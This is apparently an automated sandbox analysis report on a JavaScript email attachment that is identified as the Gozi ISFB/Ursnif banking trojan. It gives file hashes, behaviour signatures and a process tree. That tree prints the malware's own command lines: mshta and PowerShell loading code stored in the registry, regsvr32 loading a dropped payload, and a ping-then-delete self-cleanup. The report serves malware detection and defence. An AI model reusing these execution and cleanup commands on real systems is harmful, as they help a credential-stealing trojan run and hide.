Overview

overview

10

Static

static

my_attach_w6a.js

windows7_x64

10

my_attach_w6a.js

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    122s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    10-05-2020 11:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    my_attach_w6a.js

  • Size

    3.5MB

  • MD5

    41f0a90ea0ea504797e3532855e0f84e

  • SHA1

    f1bfd6388010c52ffeb7ad715777d336606578f2

  • SHA256

    f9618a3874287470fdf554b82d5466a6c2a39344ec24c0eb82ad810725954a8d

  • SHA512

    50c5099240adbf4b1c4ccd4084ce17937ec7e64aa2cb4a43fa1f674396660e803fcc8fe8dbab1e0f378e15cd932fb92bcded637fee1921fe627da8aebf24956e

Score
10/10
bankertrojangozi_ifsbursnifspyware

Malware Config

Signatures

  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious behavior: EnumeratesProcesses 1796 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Checks whether UAC is enabled 3 IoCs
  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Loads dropped DLL 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetThreadContext
    • Suspicious behavior: MapViewOfSection
    • Suspicious behavior: GetForegroundWindowSpam
    PID:2984
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\my_attach_w6a.js
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3008
      • C:\Windows\System32\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\\UJtYZ.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3904
        • C:\Windows\SysWOW64\regsvr32.exe
          -s C:\Users\Admin\AppData\Local\Temp\\UJtYZ.txt
          4⤵
          • Loads dropped DLL
          PID:2212
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 848
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            • Program crash
            PID:3324
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\28FFF86C-67D8-9AFA-31DC-8B6EF5D0EF82\\AxInrvps'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2296
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\28FFF86C-67D8-9AFA-31DC-8B6EF5D0EF82").AppCbcd))
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        PID:2284
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1s1jljz4\1s1jljz4.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3328
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES574D.tmp" "c:\Users\Admin\AppData\Local\Temp\1s1jljz4\CSC61F3800B5A85417193B3BBB9DF21F4C.TMP"
            5⤵
              PID:1328
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t3yhqs3x\t3yhqs3x.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2024
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5867.tmp" "c:\Users\Admin\AppData\Local\Temp\t3yhqs3x\CSC68A2C3B53D9C4609BD7179A727E28FF5.TMP"
              5⤵
                PID:2820
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\UJtYZ.txt"
          2⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          PID:3636
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2128
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\5D21.bi1"
          2⤵
            PID:1312
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:2372
            • C:\Windows\system32\cmd.exe
              cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\50F1.bi1"
              2⤵
                PID:1788
                • C:\Windows\system32\nslookup.exe
                  nslookup myip.opendns.com resolver1.opendns.com
                  3⤵
                    PID:2472
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5D21.bi1"
                  2⤵
                    PID:524
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\50F1.bi1"
                    2⤵
                      PID:3876
                  • C:\Windows\System32\RuntimeBroker.exe
                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                    1⤵
                      PID:3376
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                      1⤵
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      • Checks whether UAC is enabled
                      • Suspicious use of FindShellTrayWindow
                      • Modifies Internet Explorer settings
                      PID:2448
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2448 CREDAT:82945 /prefetch:2
                        2⤵
                        • Suspicious use of SetWindowsHookEx
                        • Checks whether UAC is enabled
                        • Modifies Internet Explorer settings
                        PID:2760
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2448 CREDAT:82950 /prefetch:2
                        2⤵
                        • Suspicious use of SetWindowsHookEx
                        • Checks whether UAC is enabled
                        • Modifies Internet Explorer settings
                        PID:3784

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • memory/2128-21-0x00000219C3020000-0x00000219C3021000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2284-13-0x0000027A56160000-0x0000027A56211000-memory.dmp

                      Filesize

                      708KB

                      Download

                    • memory/2448-18-0x000002A26E7F0000-0x000002A26E7F1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2984-12-0x0000000000830000-0x0000000000831000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/2984-19-0x0000000004E60000-0x0000000004F11000-memory.dmp

                      Filesize

                      708KB

                      Download

                    • memory/2984-17-0x0000000004DA0000-0x0000000004E51000-memory.dmp

                      Filesize

                      708KB

                      Download

                    • memory/2984-15-0x0000000004DA0000-0x0000000004E51000-memory.dmp

                      Filesize

                      708KB

                      Download

                    • memory/3324-23-0x00000000050A0000-0x00000000050A1000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3324-24-0x0000000005760000-0x0000000005761000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3376-14-0x000001A140B10000-0x000001A140B11000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3636-22-0x00000268E75A0000-0x00000268E7651000-memory.dmp

                      Filesize

                      708KB

                      Download

                    • memory/3636-16-0x00000268E7290000-0x00000268E7291000-memory.dmp

                      Filesize

                      4KB

                      Download